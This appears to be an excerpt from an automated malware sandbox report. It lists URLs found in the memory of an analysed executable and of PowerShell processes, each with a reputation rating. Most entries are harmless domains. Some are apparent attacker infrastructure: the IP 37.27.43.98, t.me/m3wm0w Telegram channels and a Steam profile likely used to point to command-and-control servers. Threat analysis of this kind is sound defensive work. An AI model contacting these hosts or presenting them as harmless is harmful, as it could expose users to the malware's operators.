                                                  https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                    		high
                                                    https://www.youtube.com168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.google.com168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                          		high
                                                          https://t.me/m3wm0wT168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://steamcommunity.com/profiles/76561199804377619p1up1Mozilla/5.0168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.drfalse
                                                              		high
                                                              https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.1567151650.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567151650.00000000043F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1555257254.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1619557449.0000000004848000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.0000000005151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1695247796.00000000046B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                  		high
                                                                  https://steamcommunity.com/profiles/76561199804377619/badges168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                    		high
                                                                    https://t.me/_~168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                        		high
                                                                        https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.1558683585.0000000006089000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1606744691.00000000061B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://steamcommunity.com/profiles/76561199804377619#168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://37.27.43.98/5168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://t.me/m3wm0wc168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://s.ytimg.com;168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameYYjRtxS70h.exe, 00000000.00000002.1791353691.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567151650.0000000004414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1555257254.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1619557449.000000000480D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.0000000005151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1695247796.0000000004679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                                      		high
                                                                                      https://steamcommunity.com/profiles/76561199804377619/168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://37.27.43.98/A168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://steam.tv/168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://37.27.43.9876561199804377619[1].htm0.14.drfalse
                                                                                              		unknown
                                                                                              https://t.me/m3wm0w3168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1812013102.0000000000A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://steamcommunity.com/o168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://steamcommunity.com/login/home/?goto=profiles%2F7656119980437761976561199804377619[1].htm0.14.drfalse
                                                                                                    		high
                                                                                                    https://37.27.43.98/icate168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://t.me/m3wm0w7168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000005.00000002.1555257254.0000000005177000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://store.steampowered.com/privacy_agreement/168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748291843.0000000000193000.00000004.00000010.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                                                                		high
                                                                                                                https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=_92T168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                                                                  		high
                                                                                                                  https://api.P168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://contoso.com/Iconpowershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://store.steampowered.com/points/shop/168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                                                                        		high
                                                                                                                        https://steamcommunity.com/profiles/76561199168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://t.me/y~168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://sketchfab.com168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://lv.queniujq.cn168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.youtube.com/168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://store.steampowered.com/privacy_agreement/168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                                                                                      		high
                                                                                                                                      https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=engli168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                                                                                        		high
